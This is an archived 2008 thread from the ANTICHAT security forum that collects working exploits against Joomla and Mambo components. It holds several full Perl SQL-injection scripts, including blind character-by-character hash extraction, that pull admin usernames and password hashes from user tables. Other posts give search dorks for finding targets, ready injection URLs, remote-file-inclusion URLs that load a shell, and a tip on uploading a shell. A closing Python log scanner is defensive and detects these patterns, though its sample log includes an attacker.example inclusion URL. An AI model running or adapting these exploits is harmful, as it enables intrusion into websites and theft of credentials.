ANTICHAT: information security, OSINT and technology forum
ANTICHAT is a Russian-language community for security, OSINT and programming.
The forum previously ran on the domains antichat.ru, antichat.com and antichat.club,
and is now available again at a new address:
forum.antichat.xyz.
The forum has been restored and continues to develop: archived threads are available, and new discussions and materials are being added.
⚠️ Old accounts cannot be restored; you need to register again.

09.06.2008, 21:40
Joomla Component News Portal <= 1.0 Blind SQL Injection Exploit
Code:
#!/usr/bin/perl
#[[Script Name: Joomla Component News Portal <= 1.0 Blind SQL Injection Exploit
#[[Coded by : MEFISTO
#[[Author : ilker Kandemir
#[[Dork : "index.php?option=com_news_portal" or "Powered by iJoomla News Portal"
use IO::Socket;
if(@ARGV < 1){
print "
[[========================================================================
[[// Joomla Component News Portal <= 1.0 Blind SQL Injection Exploit
[[// Usage: cnp.pl [target]
[[// Example: cnp.pl victim.com
[[// Vuln&Exp : iLker Kandemir a.k.a MEFISTO
[[// website : www.dumenci.net -
[[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/index.php?option=com_news_portal&Itemid=";
print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}
$target = "-1%20union%20select%20111,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),333%20from%20jos_users/*";
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /username:(.*?)pass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /password:(.*?)border/){
print "+ Password: $1\n";
}
if ($answer =~ /Syntax error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
# milw0rm.com [2008-06-09]
Last edited by maxster; 09.06.2008 at 22:25.

13.06.2008, 21:45
Mambo Component galleries v 1.0 Remote SQL Injection
Code:
#!/usr/bin/perl -w
# Mambo Component galleries v 1.0 Remote SQL Injection #
########################################
#[*] Found by : Houssamix From H-T Team
#[*] H-T Team [ HouSSaMix + ToXiC350 ]
#[*] Greetz : bugtr4cker & Stack & HaCkeR_EgY & Hak3r-b0y & All friends & All muslims HaCkeRs :)
#[*] Script_Name: "Mambo"
#[*] Component_Name: galleries v 1.0
########################################
# <mosinstall type="component">
# <name>galleries</name>
#<creationDate>10/04/2006</creationDate>
#<author>Vinay Kr. Singh</author>
#<copyright>This component is released under the GNU License</copyright>
#<authorEmail>vinay.singh@yahoo.com</authorEmail>
#<authorUrl>www.opensource.com</authorUrl>
#<version>1.0</version>
system("color f");
print "\t\t########################################################\n\n";
print "\t\t# Viva Islam #\n\n";
print "\t\t########################################################\n\n";
print "\t\t# Mambo Component galleries 1.0 Remote SQL Injection #\n\n";
print "\t\t# H-T Team [HouSSaMiX - ToXiC350] #\n\n";
print "\t\t########################################################\n\n";
use LWP::UserAgent;
print "\nEnter your Target (http://site.com/mambo/): ";
chomp(my $target=<STDIN>);
$uname="username";
$passwd="password";
$magic="mos_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=com_galleries&id=10&aid=-1%20union%20select%201,2,3,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62))from/**/".$magic."/**";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
print "\n[+] The Target : ".$target."";
if ($answer =~ /<user>(.*?)<user>/){
print "\n[+] Admin User : $1";
}
$host2 = $target . "index.php?option=com_galleries&id=10&aid=-1%20union%20select%201,2,3,".$passwd."/**/from/**/".$magic."/**";
$res2 = $b->request(HTTP::Request->new(GET=>$host2));
$answer = $res2->content;
if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Exploit succeed! #\n\n";
}
else{print "\n[-] Exploit Failed...\n";
}
# codec by Houssamix From H-T Team
# milw0rm.com [2008-06-13]
Last edited by .Begemot.; 13.06.2008 at 22:04.

14.06.2008, 12:42
Mambo <= 4.6.4 Remote File Inclusion Vulnerability
Code:
.-----------------------------------------------------------------------------.
| vuln.: Mambo <= 4.6.4 Remote File Inclusion Vulnerability |
| download: http://mambo-foundation.org/ |
| |
| author: irk4z@yahoo.pl |
| homepage: http://irk4z.wordpress.com/ |
| |
| greets to: all friends ;) |
'-----------------------------------------------------------------------------'
# code:
/includes/Cache/Lite/Output.php :
1 <?php
2
3 /**
4 * This class extends Cache_Lite and uses output buffering to get the data to cache.
5 *
6 * There are some examples in the 'docs/examples' file
7 * Technical choices are described in the 'docs/technical' file
8 *
9 * @package Cache_Lite
10 * @version $Id: Output.php,v 1.1 2005/07/22 01:57:13 eddieajau Exp $
11 * @author Fabien MARTY <fab@php.net>
12 */
13
14 require_once($mosConfig_absolute_path . '/includes/Cache/Lite.php');
...
^ no comment.. RFI in line 14..
# exploit:
http://[host]/[path]/includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://shell?
# milw0rm.com [2008-06-13]

18.06.2008, 11:12
Joomla components AstatsPro:
/administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(username,password,0x2e,usertype)+from+jos_users+limit+2,1--
You can get into phpMyAdmin by obtaining the password with JoomlaXplorer (if it is installed): after obtaining the password, go into the JoomlaXplorer component, then find configuration.php and read the DB login and password from it.
A shell can also be uploaded with this component.

22.06.2008, 12:46
Joomla Component expshop Remote SQL injection
Vulnerability:
http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid={SQL}
Example:
http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid=-2 UNION SELECT @@version,@@version,concat(username,0x3a,password) FROM jos_users--
# milw0rm.com [2008-06-22] http://www.milw0rm.com/exploits/5893

25.06.2008, 12:57
Joomla Component com_facileforms 1.4.4
The vulnerability allows a remote user to execute an arbitrary PHP script on the target system. It exists because of insufficient validation of input data in the "ff_compath" parameter of the facileforms.frame.php script. A remote user can execute an arbitrary PHP script on the target system with the privileges of the web server.
Exploit:
www.site.com/path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL]
/path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL]

25.06.2008, 14:10
Mambo Component Articles Blind SQL Injection 0-day Exploit by Ded MustD!e
Code:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #######################################################################\n";
print " # Mambo Component Articles Blind SQL Injection Exploit #\n";
print " # Author:Ded MustD!e [www.antichat.ru] #\n";
print " # #\n";
print " # Dork : inurl:option=articles artid #\n";
print " # Usage: perl exploit.pl host path <options> #\n";
print " # Example: perl exploit.pl www.host.com /joomla/ -a 2 #\n";
print " # #\n";
print " # Options: #\n";
print " # -a valid Article id #\n";
print " #######################################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $aid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"a"})
{
$aid = $options{"a"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $aid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=articles&task=viewarticle&artid=".$aid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),".$i.",1))=".$h."";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "Back";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}

26.06.2008, 08:40
Joomla Component netinvoice Remote SQL injection
POC :
Code:
http://localhost/[Joomla_Path]/index.php?option=com_netinvoice&action=orders&task=order&cid={SQL}
Example:
Code:
http://localhost/[Joomla_Path]/index.php?option=com_netinvoice&action=orders&task=order&cid=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 FROM jos_users--
(c)milw0rm.com

29.06.2008, 20:09
Joomla Component beamospetition Remote SQL injection
[*] Author : His0k4 [ALGERIAN HaCkEr]
[*] Dork : inurl:com_beamospetition
[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet={SQL}
[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet=-5 UNION SELECT user(),user(),user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user() FROM jos_users--
------------------------------------------------------------------------
# milw0rm.com [2008-06-28]

01.07.2008, 16:12
Mambo Component n-gallery SQL Injection
DORK : allinurl:"com_n-gallery"
index.php?option=com_n-gallery&Itemid=29&sP=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users/*
milw0rm.com [2008-06-30]
and also
Joomla Component Xe webtv Blind SQL Injection Exploit
Code:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " ################################################################\n";
print " # Joomla Component Xe webtv Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Conctact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.dz-secure.com #\n";
print " # http://www.palcastle.org/cc #\n";
print " # #\n";
print " # Dork: inurl:com_xewebtv #\n";
print " # Usage: perl xewebtv.pl host path <options> #\n";
print " # Example: perl xewebtv.pl www.host.com /joomla/ -t 11 -c 2 #\n";
print " # #\n";
print " # Options: #\n";
print " # -t Valid tv id #\n";
print " # -c Category value of the following id #\n";
print " # Note: #\n";
print " # You can change the match string if you need that #\n";
print " ################################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $cid = $ARGV[2];
my $tid = $ARGV[3];
my %options = ();
GetOptions(\%options, "c=i", "p=s", "t=i");
print "[~] Exploiting...\n";
if($options{"c"})
{
$cid = $options{"c"};
}
if($options{"t"})
{
$tid = $options{"t"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $cid, $tid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $cid, $tid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $cid = shift;
my $tid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_xewebtv&Itemid=60&func=detail&id=".$tid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "viewcategory&catid=".$cid."";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
# milw0rm.com [2008-06-28]
Last edited by Rubaka; 04.07.2008 at 01:03.
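A defender-side check for the request patterns that run through this whole thread: the UNION SELECT ... FROM jos_users / mos_users payloads, the character-by-character blind probes from the Articles and Xe webtv scripts, and the mosConfig_absolute_path / ff_compath remote-include URLs. This is an added Python example, not code from any of the posts above; the rule regexes, the log format and the sample log lines are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Detection rules distilled from the payloads quoted in this thread
# (constructed for this example; tune the table names to your own site).
RULES = [
    ("union-select against the users table",
     re.compile(r"union\s+select\b.*\bfrom\s+(?:jos|mos)_users", re.I)),
    ("blind char-by-char password probe",
     re.compile(r"substring\(\(select\b.*?\)\s*,\s*\d+\s*,\s*1\s*\)\)?\s*=\s*(?:char\(\d+\)|\d+)", re.I)),
    ("remote file inclusion via path parameter",
     re.compile(r"(?:mosConfig_absolute_path|ff_compath)=https?://", re.I)),
]
# Apache combined-log prefix: client IP, then the request line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

def normalise(url):
    # URL-decode, then collapse the /**/ and whitespace padding the payloads use.
    s = unquote_plus(url)
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s)

def classify(url):
    # Names of every rule the decoded request URL trips (empty list = clean).
    u = normalise(url)
    return [name for name, rx in RULES if rx.search(u)]

def scan(log_lines):
    # Count (client IP, rule) pairs: a blind probe shows up as a burst from one IP.
    hits = Counter()
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, url = m.groups()
        for name in classify(url):
            hits[(ip, name)] += 1
    return hits

# Constructed sample log lines modelled on the payloads in this thread.
SAMPLE_LOG = [
    '198.51.100.7 - - [09/Jun/2008:21:40:01 +0300] "GET /index.php?option=com_news_portal&Itemid=12 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [09/Jun/2008:21:40:02 +0300] "GET /joomla/index.php?option=com_news_portal&Itemid=-1%20union%20select%20111,concat(username,password),333%20from%20jos_users/* HTTP/1.1" 200 6011',
    '203.0.113.5 - - [09/Jun/2008:21:40:03 +0300] "GET /joomla/index.php?option=articles&task=viewarticle&artid=2%20and%20ascii(SUBSTRING((SELECT%20password%20FROM%20mos_users%20LIMIT%200,1),1,1))=48 HTTP/1.1" 200 4302',
    '203.0.113.5 - - [09/Jun/2008:21:40:04 +0300] "GET /joomla/index.php?option=articles&task=viewarticle&artid=2%20and%20ascii(SUBSTRING((SELECT%20password%20FROM%20mos_users%20LIMIT%200,1),1,1))=49 HTTP/1.1" 200 4302',
    '203.0.113.9 - - [13/Jun/2008:21:45:00 +0300] "GET /includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://attacker.example/s.txt? HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for (ip, rule), n in sorted(scan(SAMPLE_LOG).items()):
        print(f"{ip:15} {n:3}  {rule}")
```

The per-IP counts are what make the blind-injection posts visible: each script above issues up to 36 requests per hash character, so a single client tripping the probe rule dozens of times in a minute is the signal, not any one request.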